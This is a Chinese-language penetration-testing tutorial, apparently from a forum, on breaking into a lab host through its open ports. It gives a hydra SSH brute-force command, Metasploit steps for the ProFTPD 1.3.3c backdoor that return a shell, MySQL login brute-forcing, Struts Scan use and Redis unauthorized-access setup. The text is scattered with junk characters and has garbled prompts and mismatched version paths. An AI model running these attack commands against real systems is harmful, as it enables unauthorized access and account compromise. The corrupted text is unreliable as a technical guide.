常见的端口漏洞入侵主机

fudyou

                涉及知识点端口漏洞利用当我们渗透一个网站时发现从网站渗透不进去的时候，就可以查看该网站主机开启了哪些端口，来从其开启的端口来进行入侵一旦端口开放的话就可以从外部访问，操作系统都有或多或少的漏洞，特殊的请求或者指令触发之后就可以提升权限实验环境同一网段的两台主机：入侵主机：kali目标主机ip：192.168.31.69使用kali和它本身自带的一些工具对受害主机进行入侵先利用nmap对受害主机进行扫描查看其开启了哪些端口和服务访问该ip发现80端口是一个phpinfo页面，无法利用80端口入侵所以我们开始尝试从其他端口入侵该主机22端口漏洞利用发现其开启了22端口，22端口是SSH远程登录协议。最有可能利用的是弱口令的入侵。使用kali自带hydra来进行暴力破解22端口暴力破解ssh命令：hydra -L /root/桌面/username.txt -P /root/桌面/password.txt -vV -o ssh.log -e ns -f 192.168.31.69 ssh
7 T9 e6 s# E4 E9 f4 _3 `5 a% i2 k参数详解：
3 f1 x8 z1 J% {" N-L //暴力破解用户名字典-P //暴力破解密码字典-o ssh.log //输出到这个文件里-vV //显示过程-f //搜到账号密码就停止经过一段时间的等待发现功夫不负有心人，还真破解出了22端口的登录账号密码然后我们就可以使用破解出来的账号密码成功利用22端口远程登录主机并且发现是root权限21端口漏洞利用通过nmap扫描知道21端口开启的ftp版本是ProFTPD 1.3.3c，百度发现ProFTPD 1.3.3c有个后门命令执行漏洞启动msfconsole搜索ProFTPD 1.3.3c查看其漏洞模块search ProFTPD 1.3.3c
$ h1 q* a% c; P9 ~, G
切换到该漏洞模块下，并设置好目标ipuse exploit/unix/ftp/proftpd_133c_backdoor
) {1 O! D7 [4 O6 Tset RHOSTS 192.168.31.69
run

2 L6 v& Y( f" L+ g, ^成功反弹shell会话3306端口漏洞利用发现该主机还开启了3306端口，那么我们如何利用3306端口入侵目标主机呢？3306端口是MySQL的默认端口，入侵者可以通过入侵3306端口来入侵我们的主机，在Metasploitable系统中，Mysql的身份认证存在漏洞，这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库启动msfconsole扫描mysql模块msf5 > search mysql选择MySQL可用模块，在模块中选择渗透工具模块进行攻击这里我们切换到mysql扫描模块，设置模块有效选项msf5 > use auxiliary/scanner/mysql/mysql_login
1 o) k1 j" i: S* F& imsf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.31.69 #设置目标ip
txt5 auxiliary(scanner/mysql/mysql_login) > set USER_FILE /root/桌面/username.txt #设置用户名字典
txt5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/桌面/password.txt #设置密码字典
1 q6 A1 O5 N7 Z2 pmsf5 auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true #破解成功时停止
msf5 auxiliary(scanner/mysql/mysql_login) >run #开始爆破
成功爆破出MySQL用户名密码
$ O5 s) Y. k% w. [( C利用爆破出的账号密码成功登录MySQL数据库8080端口入侵发现8080端口有一个网站Struts，百度发现Struts可以使用Struts Scan工具获得指定漏洞交互式shell下载Struts Scan解压，并切换到struts-scan-master目录下执行root@kali:~/桌面/struts-scan-master# python struts-scan.py出现如下界面则安装成功使用给出的指定漏洞交互shell执行payload成功获得交互式shell6379端口漏洞入侵该主机还开启了6379端口，发现6379端口可以利用Redis未授权访问漏洞来入侵在本地下载Redis并解压安装wget http://download.redis.io/releases/redis-4.0.8.tar.gz
3 q/ Z, [0 Y9 e, Z8 }' L* [) ztar xzf redis-4.0.8.tar.gz
cd redis-3.2.0
/ i% P; P) k! i6 x' Imake
2 T/ f! q* p# X8 ~$ e8 m2 n" Y
修改配置文件，使可以远程访问在bind 127.0.0.1前面加上#将其注释掉把protected-mode后面的yes设为no启动redis-server./src/redis-server redis.conf     
9 `+ v7 k- U! l" |3 n, M如果报错执行下列命令cd /root/redis-4.0.8/src
' L" ~. C2 t7 t9 K; k6 ?+ f' y
8 J; e* R3 g5 a# U! _
) Z5 q. U" q5 x( v! V$ B然后连接redis发现成功连接
. G4 K  T( S5 ?7 p& R7 F